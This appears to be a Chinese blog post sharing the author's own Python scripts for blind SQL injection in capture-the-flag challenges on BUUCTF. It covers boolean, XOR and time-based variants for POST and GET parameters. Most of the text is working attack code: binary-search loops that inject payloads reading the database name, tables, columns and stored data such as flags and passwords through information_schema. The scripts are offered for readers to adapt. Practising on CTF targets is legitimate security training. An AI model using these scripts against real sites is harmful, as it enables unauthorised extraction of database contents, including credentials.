以下的几个脚本都是自己写的(有参考别的大佬),代码可能不是最精简,但是还算顺眼
核心算法都是二分法,不推荐时间盲注(速度硬伤)
脚本payload参考题目:[第一章 web入门]SQL注入-2 / 极客大挑战finilysql(buuctf)
1.通过post传参的脚本
用的时候修改post参数和个数
1.1 基于异或盲注,布尔盲注等:
import requests
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''
for i in range(1, 1000):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
#payload = f"1' or ascii(substr(database(),{i},1))>{mid}#" #查库
#payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#" #查表
#payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#" #查列
payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#" #查数据
data = {
"name":payload,
"pass":'qwer'
}
response = requests.post(url, data = data)
if 'u6216' in response.text:
low = mid + 1
else:
high = mid
mid = (low + high) // 2
if low != 32 :
flag += chr(int(low))
else:
break
print(flag)
1.2 基于时间盲注:
import requests
import time
url = 'http://736aa374-b497-441f-9b6a-a1c91f9b182b.node4.buuoj.cn:81/login.php'
flag = ''
for i in range(1,1000):
high = 127
low = 32
mid = (low + high) // 2
while high > low:
#payload = f"1' or if(ascii(substr(database(),{i},1))>{mid},sleep(2),1)#" #查库名
#payload = f"1'or if(ascii(substr((seleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid},sleep(2),1)#" #查表名
#payload = f"1'or if(ascii(substr((seleCt(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),{i},1))>{mid},sleep(2),1)#" #查列名
payload = f"1'or if(ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid},sleep(2),1)#" #查数据
data = {
"name":payload,
"pass":'qwer'
}
last = int(time.time())
response = requests.post(url, data = data)
now = int(time.time())
if now - last > 1 :
low = mid + 1
else :
high = mid
mid = (low + high) // 2
if low != 32 :
flag += chr(int(low))
else:
break
print(flag)
2.通过get传参的脚本
修改url 和 文本
2.1 基于异或盲注,布尔盲注等:
import requests
url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''
for i in range(1,1000):
min = 32
max = 128
while min<max:
mid = (min + max) // 2
payload=f"1^(ascii(substr(database(),{i},1))>{mid})#" #查库名
#payload=f"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='geek'),{i},1))>{mid})#" #查表名
#payload=f"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='F1naI1y'),{i},1))>{mid})#" #查列名
#payload=f"1^(ascii(substr((select(group_concat(password))from(F1naI1y)),{i},1))>{mid})#" #查数据
response=requests.get(url=url+payload)
if 'ERROR' in response.text:
min = mid + 1
else:
max=mid
if min != 32 :
name += chr(min)
else:
break
print(name)
2.2 基于时间盲注:
import requests
import time
url = "http://d98fb290-369c-4ad8-8cd5-883846041dad.node4.buuoj.cn/search.php?id="
name = ''
for i in range(1,1000):
min = 32
max = 128
while min<max:
mid = (min + max) // 2
payload=f" " #查库名
#payload=f" " #查表名
#payload=f" " #查列名
#payload=f" " #查数据
last = int(time.time())
response=requests.get(url=url+payload)
now = int(time.time())
if now - last > 1:
min = mid + 1
else:
max=mid
if min != 32 :
name += chr(min)
else:
break
print(name)
3.备注
1.payload不放了,这个做题慢慢积累,网上也都有,根据题目自己写
2.能不使用sleep就不使用,速度比其他的方法慢太多
3.在网不好的情况下可能会出现脚本打印的字符错误,不是代码问题
4.自己写的脚本可能不完善,有问题或者有建议留言,有需求也可以自改
5.遇到新的脚本或者方法再补充